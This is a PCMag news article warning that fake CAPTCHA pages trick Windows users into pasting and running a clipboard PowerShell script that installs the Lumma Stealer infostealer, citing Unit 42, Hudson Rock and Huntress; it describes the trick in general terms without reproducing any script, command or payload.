PCMag editors select and review products independently. If you buy through affiliate links, we may earn commissions, which help support our testing.

PCMag UK

This CAPTCHA Test Can Trick Windows Users Into Installing Malware

Hackers have been spotted circulating a fake CAPTCHA test that looks benign, but can actually manipulate Windows users into installing an infostealing malware.

Michael Kan
 & Michael Kan Principal Reporter

Our team tests, rates, and reviews more than 1,500 products each year to help you make better buying decisions and get more from technology.

Our Expert
LOOK INSIDE PC LABS HOW WE TEST
65 EXPERTS
43 YEARS
41,500+ REVIEWS
(Hacker's phishing page/PCMag)

CAPTCHA tests are often routine and boring, which can cause you to turn off your brain and mindlessly click through them. But that inattention is precisely what one group of hackers is trying to exploit. 

In recent weeks, security researchers have spotted hackers circulating a fake CAPTCHA test, which can actually install malware over a Windows PC if you follow all the instructions on the screen. 

A CAPTCHA test is designed to filter out bots by requiring visitors to a website prove that they’re human. To do so, the tests can often ask you to select the correct objects in an image, or type in a word.

The malicious CAPTCHA test takes the same approach, but asks the user to go to their keyboard, and perform some commands. The instructions may look benign and simple, but in reality the CAPTCHA test is asking the Windows user to install the Lumma Stealer malware, which can loot passwords, cookies and cryptocurrency wallet details from the user’s PC.

(Unit 42)

Specifically, the malicious CAPTCHA test will ask the unsuspecting user to press “Windows + R,” which will trigger their PC to open the run dialog box, a way to launch programs. The test then asks the user to press “CTRL + V” and then enter. If the user does this quickly, they might not realize that the CAPTCHA has actually caused them to paste a PowerShell script into the run dialog box, and then execute it. 

Recommended by Our Editors

Google Will Soon Spot Fake Calls on Supported Android Phones
Google Will Soon Spot Fake Calls on Supported Android Phones
Report Cites Misinformation As Key Threat to Election Security, Doesn't Name the Biggest Offenders
Report Cites Misinformation As Key Threat to Election Security, Doesn't Name the Biggest Offenders
Meta's AI Chatbot Allegedly Helped Hackers Hijack Instagram Accounts
Meta's AI Chatbot Allegedly Helped Hackers Hijack Instagram Accounts

It turns out the PowerShell script will actually retrieve a “Windows EXE for Lumma Stealer malware,” according to security researchers at Palo Alto Networks’s Unit 42, which first warned about the fake CAPTCHA tests last month. 

(Unit 42)

The cybersecurity firm Hudson Rock adds that the hackers are triggering internet browsers to copy the PowerShell script upon visiting malicious web pages hosting the fake CAPTCHA test. “By inspecting the source, we found a JavaScript snippet. This code clearly shows that when the verification button is clicked, the encrypted code is automatically copied to the clipboard,” Hudson Rock’s report says. 

The fake CAPTCHA tests also continue to show up, according to security researcher John Hammond at Huntress, which spotted the attack technique again earlier this week. 

The malicious CAPTCHA tests could also be easily circulated to targets by sending them phishing emails or messages. So users should be on guard if they encounter any unusual requests from a CAPTCHA test that comes their way; it could be a trap.

About Our Expert

Michael Kan

Michael Kan

Principal Reporter

My Experience

I've been a journalist for over 15 years. I got my start as a schools and cities reporter in Kansas City and joined PCMag in 2017, where I cover satellite internet services, cybersecurity, PC hardware, and more. I'm currently based in San Francisco, but previously spent over five years in China, covering the country's technology sector.

Since 2020, I've covered the launch and explosive growth of SpaceX's Starlink satellite internet service, writing 600+ stories on availability and feature launches, but also the regulatory battles over the expansion of satellite constellations, fights with rival providers like AST SpaceMobile and Amazon, and the effort to expand into satellite-based mobile service. I've combed through FCC filings for the latest news and driven to remote corners of California to test Starlink's cellular service.

I also cover cyber threats, from ransomware gangs to the emergence of AI-based malware. In 2024 and 2025, the FTC forced Avast to pay consumers $16.5 million for secretly harvesting and selling their personal information to third-party clients, as revealed in my joint investigation with Motherboard.

I also cover the PC graphics card market. Pandemic-era shortages led me to camp out in front of a Best Buy to get an RTX 3000. I'm now following how the AI-driven memory shortage is impacting the entire consumer electronics market. I'm always eager to learn more, so please jump in the comments with feedback and send me tips.

The Best Tech I've Had:

  • My first video game console: a Nintendo Famicom
  • I loved my Sega Saturn despite PlayStation's popularity.
  • The iPod Video I received as a gift in college
  • Xbox 360 FTW
  • The Galaxy Nexus was the first smartphone I was proud to own.
  • The PC desktop I built in 2013, which still works to this day.

Read the latest from Michael Kan

Read full bio